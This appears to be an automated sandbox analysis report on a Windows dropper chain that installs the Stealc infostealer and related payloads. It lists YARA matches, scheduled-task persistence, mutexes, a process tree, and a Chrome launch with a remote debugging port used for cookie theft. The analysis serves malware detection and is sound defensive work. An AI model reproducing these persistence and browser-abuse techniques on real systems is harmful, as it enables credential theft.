                                  Source: 11.2.stealc_valenciga.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
                                  Source: 33.2.0d261d49cf.exe.b60000.0.unpack, type: UNPACKEDPEMatched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpack, type: UNPACKEDPEMatched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, type: DROPPEDMatched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe, type: DROPPEDMatched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
                                  PE file contains section with special chars
                                  Source: ebjtOH70jl.exeStatic PE information: section name:
                                  Source: ebjtOH70jl.exeStatic PE information: section name: .idata
                                  Source: axplong.exe.0.drStatic PE information: section name:
                                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                                  Source: random[1].exe.5.drStatic PE information: section name:
                                  Source: random[1].exe.5.drStatic PE information: section name: .idata
                                  Source: 0d261d49cf.exe.5.drStatic PE information: section name:
                                  Source: 0d261d49cf.exe.5.drStatic PE information: section name: .idata
                                  Source: random[1].exe0.5.drStatic PE information: section name:
                                  Source: random[1].exe0.5.drStatic PE information: section name: .idata
                                  Source: 834ad20df2.exe.5.drStatic PE information: section name:
                                  Source: 834ad20df2.exe.5.drStatic PE information: section name: .idata
                                  Source: random[1].exe1.5.drStatic PE information: section name:
                                  Source: random[1].exe1.5.drStatic PE information: section name: .idata
                                  Source: random[1].exe1.5.drStatic PE information: section name:
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name:
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name: .idata
                                  Source: 3e641862d3.exe.5.drStatic PE information: section name:
                                  Source: random[1].exe2.5.drStatic PE information: section name:
                                  Source: random[1].exe2.5.drStatic PE information: section name: .idata
                                  Source: random[1].exe2.5.drStatic PE information: section name:
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name:
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name: .idata
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: section name:
                                  Source: skotes.exe.27.drStatic PE information: section name:
                                  Source: skotes.exe.27.drStatic PE information: section name: .idata
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeFile created: C:\Windows\Tasks\defnur.jobJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeFile created: C:\Windows\Tasks\skotes.job
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AB30680_2_00AB3068
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00A74AF00_2_00A74AF0
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00B87A7E0_2_00B87A7E
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AB2BD00_2_00AB2BD0
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00A74CF00_2_00A74CF0
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AA7D830_2_00AA7D83
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AB765B0_2_00AB765B
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AB87200_2_00AB8720
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AB6F090_2_00AB6F09
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00AB777B0_2_00AB777B
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006B30681_2_006B3068
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_00674AF01_2_00674AF0
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006B2BD01_2_006B2BD0
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_00674CF01_2_00674CF0
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006A7D831_2_006A7D83
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006B765B1_2_006B765B
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006B777B1_2_006B777B
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006B87201_2_006B8720
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 1_2_006B6F091_2_006B6F09
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0067E4405_2_0067E440
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006960C25_2_006960C2
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006B87205_2_006B8720
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00674AF05_2_00674AF0
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006B2BD05_2_006B2BD0
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00674CF05_2_00674CF0
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00690D435_2_00690D43
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006B6F095_2_006B6F09
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006B30685_2_006B3068
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006A0AF75_2_006A0AF7
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006915325_2_00691532
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006B765B5_2_006B765B
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006B777B5_2_006B777B
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00693D215_2_00693D21
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_006A7D835_2_006A7D83
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_004610006_2_00461000
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_00464C8C6_2_00464C8C
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: 6_2_00476F3A6_2_00476F3A
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006961F08_2_006961F0
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006D60148_2_006D6014
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006CD0898_2_006CD089
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006951A08_2_006951A0
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006D42678_2_006D4267
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006954508_2_00695450
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006BB6E08_2_006BB6E0
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006BF8FB8_2_006BF8FB
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006CC8FD8_2_006CC8FD
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006C2E408_2_006C2E40
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006D5EF48_2_006D5EF4
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_00694EF08_2_00694EF0
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00E0D0899_2_00E0D089
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00E160149_2_00E16014
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DD61F09_2_00DD61F0
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DD51A09_2_00DD51A0
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00E142679_2_00E14267
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DD54509_2_00DD5450
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DFB6E09_2_00DFB6E0
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00E0C8FD9_2_00E0C8FD
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DFF8FB9_2_00DFF8FB
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00E15EF49_2_00E15EF4
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00DD4EF09_2_00DD4EF0
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: 9_2_00E02E409_2_00E02E40
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCode function: String function: 00465190 appears 46 times
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: String function: 006BA790 appears 56 times
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: String function: 006B4170 appears 136 times
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: String function: 00DFA790 appears 55 times
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeCode function: String function: 00DF4170 appears 136 times
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 006A8CD3 appears 35 times
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 0068D57E appears 65 times
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 00687870 appears 42 times
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 0068DEB0 appears 64 times
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 0068D872 appears 85 times
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 0068D593 appears 37 times
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 00687F30 appears 259 times
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: String function: 00A87F30 appears 128 times
                                  Source: _overlapped.pyd.22.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: unicodedata.pyd.22.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: _pytransform.dll.22.drStatic PE information: Number of sections : 11 > 10
                                  Source: freebl3.dll.11.drStatic PE information: No import functions for PE file found
                                  Source: freebl3[1].dll.11.drStatic PE information: No import functions for PE file found
                                  Source: python3.dll.22.drStatic PE information: No import functions for PE file found
                                  Source: freebl3.dll.11.drStatic PE information: Data appended to the last section found
                                  Source: freebl3[1].dll.11.drStatic PE information: Data appended to the last section found
                                  Source: ebjtOH70jl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 11.0.stealc_valenciga.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                  Source: 11.2.stealc_valenciga.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                  Source: 33.2.0d261d49cf.exe.b60000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, type: DROPPEDMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe, type: DROPPEDMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                  Source: legs[1].exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                                  Source: legs[1].exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                                  Source: legs.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                                  Source: legs.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                                  Source: gold123[1].exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003265987168874
                                  Source: gold123[1].exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003265987168874
                                  Source: gold123.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003265987168874
                                  Source: gold123.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003265987168874
                                  Source: gold1111111111[1].exe.5.drStatic PE information: Section: .BSS ZLIB complexity 1.0003265987168874
                                  Source: gold1111111111[1].exe.5.drStatic PE information: Section: .BSS ZLIB complexity 1.0003265987168874
                                  Source: gold1111111111.exe.5.drStatic PE information: Section: .BSS ZLIB complexity 1.0003265987168874
                                  Source: gold1111111111.exe.5.drStatic PE information: Section: .BSS ZLIB complexity 1.0003265987168874
                                  Source: random[1].exe1.5.drStatic PE information: Section: jwcxmuyi ZLIB complexity 0.9905424353073354
                                  Source: 3e641862d3.exe.5.drStatic PE information: Section: jwcxmuyi ZLIB complexity 0.9905424353073354
                                  Source: random[1].exe2.5.drStatic PE information: Section: hnsygimb ZLIB complexity 0.9943114890998593
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: Section: hnsygimb ZLIB complexity 0.9943114890998593
                                  Source: 305d0bf1b2.exe.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                  Source: random[1].exe2.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@75/157@32/18
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\legs[1].exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_03
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeCommand line argument: .F6_2_0046E280
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSystem information queried: HandleInformation
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile read: C:\Users\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp, stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp, stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp, stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp, stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp, stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp, stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                                  Source: legs.exe, 0000000A.00000003.2420434201.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2433760765.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000003.2522261462.000000000977C000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2520073614.0000000005C47000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2520544163.0000000005C2D000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2523156641.0000000005C15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2615733907.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                  Source: ebjtOH70jl.exeReversingLabs: Detection: 63%
                                  Source: ebjtOH70jl.exeVirustotal: Detection: 58%
                                  Source: ebjtOH70jl.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                  Source: am209.exeString found in binary or memory: " /add
                                  Source: am209.exeString found in binary or memory: " /add /y
                                  Source: defnur.exeString found in binary or memory: " /add
                                  Source: defnur.exeString found in binary or memory: " /add /y
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeFile read: C:\Users\user\Desktop\ebjtOH70jl.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\ebjtOH70jl.exe "C:\Users\user\Desktop\ebjtOH70jl.exe"
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe "C:\Users\user\AppData\Local\Temp\1001527001\legs.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe "C:\Users\user\AppData\Local\Temp\1004899001\am209.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeProcess created: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe "C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeProcess created: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe "C:\Users\user\AppData\Local\Temp\1001527001\legs.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe "C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe "C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2132,i,6862776677671730943,9850295633516414463,262144 /prefetch:8
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe "C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeProcess created: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe "C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe "C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe "C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeProcess created: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe "C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
